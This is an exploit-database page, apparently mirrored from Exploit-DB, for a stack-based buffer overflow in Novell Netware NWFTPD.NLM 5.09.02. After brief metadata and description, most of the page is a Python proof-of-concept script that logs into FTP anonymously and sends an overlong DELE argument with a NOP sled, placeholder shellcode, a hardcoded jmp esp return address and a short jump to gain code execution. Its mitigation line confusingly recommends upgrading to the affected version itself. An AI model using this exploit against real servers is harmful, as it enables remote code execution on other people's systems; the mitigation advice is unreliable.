header-logo
Suggest Exploit
vendor:
Netware NWFTPD.NLM
by:
shahin [at] abysssec.com , info [at] abysssec.com
9
CVSS
CRITICAL
Buffer Overflow
120
CWE
Product Name: Netware NWFTPD.NLM
Affected Version From: NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8)
Affected Version To: NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8)
Patch Exists: Unknown
Related CWE: Unknown
CPE: Novell:Netware:NWFTPD.NLM
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Unknown

Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow

A buffer overflow vulnerability exists in Novell Netware NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8). A remote attacker can send a specially crafted DELE command with an overly long argument to trigger a stack-based buffer overflow and execute arbitrary code on the target system.

Mitigation:

Upgrade to the latest version of Novell Netware NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8)
Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <  Day 7 - (Binary Analysis)
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

 http://www.exploit-db.com/moaub-7-novell-netware-nwftpd-rmdrnfrdele-argument-parsing-buffer-overflow/
'''

'''
  Title            :  Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow
  Version          :  NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8)
  Analysis         :  http://www.abysssec.com
  Vendor           :  http://www.Novell.com
  Impact           :  Critical
  Contact          :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter          :  @abysssec
'''
from ftplib import FTP
import sys

try:
	netwareServerIp = '127.0.0.1'
	ftp = FTP(netwareServerIp) 				
	ftp.login('anonymous','a@a') 
	buffer = "/"
	buffer += "\x90"*107  				#nops
	buffer += "\xcc"*413				#shellcode part2 = 413 byte
	buffer += "\xb9\xa4\xe0\x91"			#EIP - jmp esp from nwftpd.nlm module
	buffer += "\xcc"*124				#shellcode part1 = 124 byte
	buffer += "\x08\xeb\x90\x90\x90\x90" 		#short jmp to shellcode part2 
	ftp.voidcmd('DELE ' + buffer) 
	
except Exception,err:
	print err

Navigation

Suggest Exploit

Services By CQR